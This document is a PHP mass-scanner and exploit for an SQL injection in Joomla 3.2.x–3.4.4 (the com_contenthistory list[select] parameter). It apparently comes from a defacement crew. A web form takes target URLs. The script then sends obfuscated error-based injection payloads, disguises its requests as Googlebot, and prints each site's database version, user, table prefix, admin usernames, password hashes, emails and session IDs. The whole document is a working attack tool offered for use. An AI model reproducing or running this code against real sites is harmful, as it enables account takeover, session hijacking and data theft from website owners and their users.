JOOMLA SQL v3.2.x - 3.4.4

1. <?php
2. @set_time_limit(0);
3. echo'<meta content=XPLOITER BY AZZATSSINS CYBERSERKERS OF PSYCHOPATH name=description>
4. <title>!!!- JOOMLA SQL | AZZATSSINS | BN-IDBTE4M -!!!</title>
5. <body style=color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;>
6. <center>
7. <form method="post">
8. <textarea name="ss" cols="30" rows="15" ></textarea><br>
9. <input name="g" type="submit" value="EXECUTE"/>
10. </form>
11. </center>';
12. $g = $_POST['g'];   $ss = $_POST['ss'];
13. if(isset($g)){
14. $arr = explode("\r\n",$ss);
15.  
16.         foreach($arr as $url){
17.         $url = @trim($url);
18.         $py1="polygon%28%28/*!00000select*/*/*!00000from*/%28/*!00000select*/*/*!00000from*/%28/*!00000select*/concat_ws%280x7e3a,0x6d616769636f,version%28%29,user%28%29%29as%20mk%29%60%60%29%60%60%29%29";
19.         $py2="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616769636f,(/*!00000select*//*!00000table_name*//*!00000from*//*!00000information_schema*/.tables/*!00000where*/table_schema=database() and/*!00000table_name*/like 0x25636f6e74656e745f7479706573 limit 0,1))as mk)``)``))";
20. $site = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py1";
21. $site2 = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py2";
22.  
23.         $src= data($site);
24.         preg_match("#select 'magico~:(.*?)~:(.*?)' AS#",$src,$m);
25.  
26.             if(!empty($m[1])){
27.             echo "----------------------------------------------------------</font><br>";
28.             echo "<b>[#] $url : vuln<b><br></font><br>";   
29.             echo "<font color=lime>[+] version : $m[1]</font><br>";
30.             echo "<font color=lime>[+] user db : $m[2]</font><br>";
31.             $src2= data($site2);
32.             preg_match("#LEFT JOIN (.*?)_users#",$src,$m2);
33.             echo "<font color=lime>[+] prefix : ".$m2[1]."_</font><br>";
34.             $prfx = $m2[1];
35.             $py3="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,(/*!00000select*/concat_ws(0x7e3a,0x6d616769636f,username,password,email)+/*!00000from*/+"."$prfx"."_users+order+by+id+ASC+limit+0,1),(/*!00000select*/session_id+/*!00000from*/+"."$prfx"."_session+order+by+time+DESC+limit+0,1))as+mk)``)``))";
36. $site3 = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py3";
37.             $src3= data($site3);
38.             preg_match("/select 'magico\~:(.*?)\~:(.*?)\~:(.*?)\~:(.*?)' AS/",$src3,$m3);
39.             echo "<font color=lime>[+] user : $m3[1]</font><br>";
40.             echo "<font color=lime>[+] pass : $m3[2]</font><br>";
41.             echo "<font color=lime>[+] email : $m3[3]</font><br>";
42.             echo "<font color=lime>[+] session_id : $m3[4]</b></font><br>";
43.                
44.             }else{echo "----------------------------------------------------------</font><br>";
45.             echo "<font color=red> [-]$url : Not Vuln </font><br>";
46.             }
47.    
48.         }
49. }
50. function data($vln){
51.  
52.         $curl = curl_init();
53.         curl_setopt($curl, CURLOPT_URL, $vln);
54.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
55.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
56.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
57.         curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
58.         $source = curl_exec($curl);
59.         return $source;
60. }
61. ?>